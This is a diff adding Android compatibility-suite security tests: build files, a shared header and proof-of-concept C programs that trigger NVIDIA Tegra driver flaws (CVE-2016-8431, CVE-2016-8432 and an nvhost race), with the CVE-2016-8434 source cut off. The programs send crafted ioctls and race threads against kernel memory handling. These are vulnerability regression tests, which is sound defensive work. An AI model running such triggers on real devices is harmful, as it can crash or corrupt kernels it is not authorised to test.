+int g_nvmap_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+int g_channel_fd = -1;
+struct nvhost_set_error_notifier g_error_notifier;
+struct nvmap_create_handle g_nvmap_hdl;
+
+struct nvmap_alloc_handle g_real_alloc = {0};
+
+int open_driver() {
+ char* dev_path = "/dev/nvhost-vic";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+
+ dev_path = "/dev/nvmap";
+ g_nvmap_fd = open(dev_path, O_RDONLY);
+ if (g_nvmap_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+ return 1;
+}
+
+void trigger_channel_open() {
+ struct nvhost_channel_open_args args = {-1};
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
+ g_channel_fd = args.channel_fd;
+}
+
+int trigger_nvmap_create() {
+ g_nvmap_hdl.size = 0x1000;
+ ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
+ return g_nvmap_hdl.handle;
+}
+
+void trigger_nvmap_free() {
+ int data = g_nvmap_hdl.handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
+}
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.align = 0x1000;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ g_real_alloc.handle = handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+}
+void prepare_data() {
+ g_error_notifier.offset = 0;
+ g_error_notifier.mem = g_nvmap_hdl.handle;
+}
+
+void trigger_set_error_notifier() {
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+void* race_thread_2(void* arg) {
+ setup_privi_and_affinity(-19, 1);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ //trigger_nvmap_create();
+ trigger_nvmap_alloc(trigger_nvmap_create());
+ prepare_data();
+ //trigger_nvmap_free();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ pthread_create(&tid, NULL, race_thread_2, NULL);
+ usleep(100 * 1000);
+ pthread_cond_broadcast(&cond);
+
+ sleep(100);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+
+struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+ gem_create.size = PAGE_SIZE;
+ return 0;
+}
+
+int main()
+{
+ int ret;
+ int i;
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].cmdbuf.offset = 8192;
+ relocs[i].target.handle = gem_create.handle;
+ relocs[i].target.offset = 8192;
+ }
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }else{
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+volatile struct drm_gem_close gem_close;
+
+volatile struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+volatile struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static int prepare()
+{
+ int i;
+
+ open_c.client = HOST1X_CLASS_VIC;
+
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+
+ gem_close.handle = 1;
+
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = 0;
+ relocs[i].cmdbuf.handle = 0;
+ relocs[i].cmdbuf.offset = 0;
+ relocs[i].target.handle = 0;
+ relocs[i].target.offset = 0;
+ }
+
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+
+ gem_create.size = PAGE_SIZE;
+
+ return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+ set_affinity(1);
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ return NULL;
+}
+
+int main()
+{
+ int ret;
+ int i;
+ __u64 try_time;
+
+ set_affinity(0);
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ try_time = 1;
+ while(1){
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].target.handle = gem_create.handle;
+ }
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ }
+ usleep(150);
+ while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+ }
+ try_time++;
+ }
+
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_join(submit_thread_id[i], NULL);
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..de88a3b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
